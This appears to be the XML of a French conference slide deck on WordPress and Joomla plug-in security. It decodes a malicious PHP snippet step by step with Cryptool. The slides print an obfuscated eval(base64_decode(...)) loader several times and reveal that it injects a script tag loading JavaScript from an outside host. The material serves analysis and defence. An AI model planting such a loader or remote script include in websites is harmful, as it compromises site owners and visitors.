              </a:rPr>
              <a:t>3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>yH5BAEAAB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOCwSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgACHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDLzMshADs=",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>C’est en fait une image encodée en base64. Rien de suspect.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49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935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Plug-ins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WordPress et Joomla! sont des systèmes extensibles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Certaines de ces extensions sont appelées plug-ins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Ces plug-ins sont une des raisons du succès de ces CMS: on trouve facilement des plug-ins pour tout et ils sont faciles à installer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Mais est-ce compatible avec la sécurité ?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5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548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Mais…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CH" sz="8000" dirty="0" smtClean="0"/>
              <a:t>Il contient aussi (suivant les versions):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-CH" dirty="0" smtClean="0"/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$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUo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M241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaS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VvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVl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OSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaS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U3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVl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QyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNy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VvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVl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OCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRC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V1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVl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aSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaS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VlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVh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RSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQi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U3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5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Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaS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cpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydH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IoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxF</a:t>
            </a:r>
          </a:p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X18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));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50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594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Cryptool 2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 smtClean="0"/>
              <a:t>Essayons de décoder ce code. Plutôt que de le faire à la main, utilisons Cryptool 2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>“Cryptool is a free, open-source e-learning application, used worldwide in the implementation and analysis of cryptographic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>algorithms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>”– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.cryptool.org</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>La version 1.4.30 est stable, mais avec une interface à la “Windows 95” et écrite en C++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Le version 2.0 est moins stable, mais plus graphique et écrite en C#/WPF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smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>51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884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 simple de Cryptool</a:t>
            </a:r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008267" cy="475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52</a:t>
            </a:fld>
            <a:endParaRPr lang="fr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457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URL Encode pour Cryptool 2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Nous allons devoir manipuler des URL (encode/decode – escape/unescape)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Il n’y a pas d’algorithme pour cela dans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>Cryptool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t> 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Nous avons donc créé notre propre plug-in pour Cryptool 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Sera accessible (freeware) sur: www.advtools.com/cryptool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53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498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c99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$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUo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M241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaS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VvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVl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OSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaS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U3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVl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QyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNy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VvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVl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OCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRC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V1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVl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aSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaS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VlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVh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RSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQi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U3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5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Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaS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cpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydH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IoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));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54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4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3 lignes de code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CH" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_F=__FILE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__;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-CH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CH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$_</a:t>
            </a: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X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUo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M241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaS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VvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVl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OSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaS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U3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVl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QyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNy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VvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVl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OCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRC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V1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVl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aSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaS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VlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVh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RSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQi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U3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5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Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH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cpPC9zY3I0cHQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH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+';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-CH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CH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eval(base64_decode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH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('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH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IoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH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X18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));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55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80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Etape #1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3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eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="13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IoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="13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X18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-CH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5776"/>
            <a:ext cx="6192688" cy="49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56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72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Etape #2</a:t>
            </a:r>
            <a:endParaRPr lang="fr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28839" cy="512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57</a:t>
            </a:fld>
            <a:endParaRPr lang="fr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5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Etape #3</a:t>
            </a:r>
            <a:endParaRPr lang="fr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7128792" cy="527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200" y="5363923"/>
            <a:ext cx="177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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>César !!!</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C0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2392002">
            <a:off x="4534654" y="4805476"/>
            <a:ext cx="1869372" cy="86409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58</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-CH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Etape #4</a:t>
            </a:r>
            <a:endParaRPr lang="fr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105997" cy="525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59</a:t>
            </a:fld>
            <a:endParaRPr lang="fr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 rot="19876285">
            <a:off x="-107326" y="1602322"/>
            <a:ext cx="2416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CH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</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH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33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Sécurité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mot “sécurité” peut vouloir dire différentes choses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Pour les fournisseurs de produits, “sécurité” signifie souvent “gestion des utilisateurs, des rôles et des droits”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Ici, nous parlons plutôt d’attaques, d’injections, de cross-site scripting et de cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>forgery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smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>6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639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Ce code est donc finalement:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;SCRIPT SRC=http://jino.ji.funpic.org/lq/security.js&gt;&lt;/SCRIPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="24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fr-CH" dirty="0" smtClean="0"/>
              <a:t>Une inclusion de script, l’équivalent d’un XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Cette adresse ne répond plus depuis un moment (404)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>On retrouve cette URL pour plusieurs shells (benladen shell, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Un mouchard ? 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60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17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Joomla! et WordPress ne suivent que partiellement les recommandations telles que celles d’OWASP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Ils ont une approche parfois opposée.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Tout le travail est laissé aux bons soins des développeurs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Concernant les plug-ins, c’est la roulette russe.</a:t>
            </a:r>
            <a:endParaRPr lang="fr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61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noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Switzerland</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – Geneva </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chapter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Meeting @ HEIG-VD (Yverdon-Les-Bains) – Feb.2011</a:t>
            </a:r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25494504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Références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Rapport Décembre 2010 de netobservatory.ch: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www.netobservatory.ch/report/pdf/NetObs_Report_01.12.2010.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Water and Stone 2010 Open Source CMS Market Share Report</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Wordpress </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Exploit Scanner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http://wordpress.org/extend/plugins/exploit-scanner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r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0"/>
              <a:t>Secure Coding with WordPress</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-CH" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.slideshare.net/markjaquith/secure-coding-with-wordpress-wordcamp-sf-2008-presentation-559310</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-CH" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0"/>
              <a:t>(attention, recommande des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0" smtClean="0"/>
              <a:t>fonctions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0"/>
              <a:t>dépréciées)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0"/>
              <a:t>WordPress Data Validation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-CH" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://codex.wordpress.org/Data_Validation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Joomla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>! Secure Code Guidelines</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://docs.joomla.org/Secure_coding_guidelines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Hardening WordPress</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>codex.wordpress.org/Hardening_WordPress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62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873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Références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OWASP A Guide to Building Secure Web Applications and Web Services 2.0.1 (2005)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http://switch.dl.sourceforge.net/project/owasp/Guide/2.0.1/OWASPGuide2.0.1.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>OWASP Application Security Verification Standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>2009 – Web Application Standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>OWASP Code Review Guide 2008 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>v1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0"/>
              <a:t>OWASP Testing Guide 2008 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0" smtClean="0"/>
              <a:t>v3.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>OWASP Top 10 2010 Edition</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Cryptool</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-CH" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cryptool.org/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-CH" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-CH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63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538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 smtClean="0"/>
              <a:t>Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8" descr="question.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="screen"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051720" y="1844824"/>
            <a:ext cx="4472935" cy="298341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442392" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{69C5922D-9CE9-4DAF-BDE8-72278C1EA405}" type="slidenum">
              <a:rPr lang="fr-CH" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23554" name="AutoShape 2" descr="http://farm4.static.flickr.com/3109/2536358399_c16896768f_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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2050" name="AutoShape 2" descr="http://farm4.static.flickr.com/3109/2536358399_c16896768f_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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2052" name="AutoShape 4" descr="http://farm4.static.flickr.com/3109/2536358399_c16896768f_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5538301" y="2822740"/>
            <a:ext cx="226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solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>© flickr.com/people/eleaf</a:t>
            </a:r>
            <a:endParaRPr lang="fr-C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 smtClean="0"/>
              <a:t>Merci!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CH" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Pour nous contacter:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-CH" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>flora@advtools.com</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>sebastien@advtools.com</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-CH" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="2000" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://www.advtools.com/blog</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-CH" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-CH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67544" y="6381328"/>
            <a:ext cx="442392" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
